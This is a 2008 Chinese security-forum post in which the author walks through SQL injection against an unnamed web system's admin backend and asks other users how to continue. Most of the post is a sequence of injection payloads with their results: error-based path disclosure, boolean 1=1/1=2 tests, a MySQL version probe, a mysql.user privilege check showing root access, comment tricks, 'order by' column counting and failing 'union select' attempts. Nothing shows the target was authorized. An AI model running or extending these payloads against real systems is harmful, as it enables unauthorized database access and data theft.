【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]奇怪的php注射点 [打印本页]

作者: 2000gaobo 时间: 2008-7-22 15:22 标题: [讨论]奇怪的php注射点

[讨论]奇怪的php注射点
议题作者：唐不狐
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

在某web系统后台检测的时候获得一个注射点，情况如下：

.php?vm=30'
报错，得到web路径 /*(窃喜ing)

.php?vm=30 and 1=1
返回正常

.php?vm=30 and 1=2
页面异常

----------------到此判断可注射----------------------------------

接下来

.php?vm=30 and ord(mid(version(),1,1))>51
返回正常,说明数据库版本大于4.0,支持union查询

.php?vm=30 and (select count(*) from mysql.user)>0
正常,嘿嘿,有权限喔.

接着用C4经典注射证实如下:mysql版本4.1.2,连接用户是root,库名也出来了

--------------------------接下来就郁闷了------------------------------------------
.php?vm=30/*buhu
返回错误,晕猪,难道不能用/*注释?
.php?vm=30#buhu
返回正常,可以用#注释

接下来常规手法猜字段长度
.php?vm=30 order by 10

报错,日,字段小于10?其实我估算了下,字段绝对在10以上的.暂且信它,继续...

.php?vm=30 order by 5 返回错误
.php?vm=30 order by 1 返回错误
.php?vm=30 order by 0 返回错误,彻底无语 (加#注释一样)

.php?vm=30 and 1=2 union select 1,2,3...... 咱就干到110,还是报错.不可能哇
换个方式
.php?vm=30 and 1=2 union select char(97),char(97),char(97)....
依然报错
---------------------------虾米意思?--------------------------------------------------

请大大们指教! thx!
1 什么原因?
2 如何继续?
帖子145 精华2 积分574 阅读权限50 性别男来自china 在线时间107 小时注册时间2005-9-27 最后登录2008-7-21 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

wyzhack

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)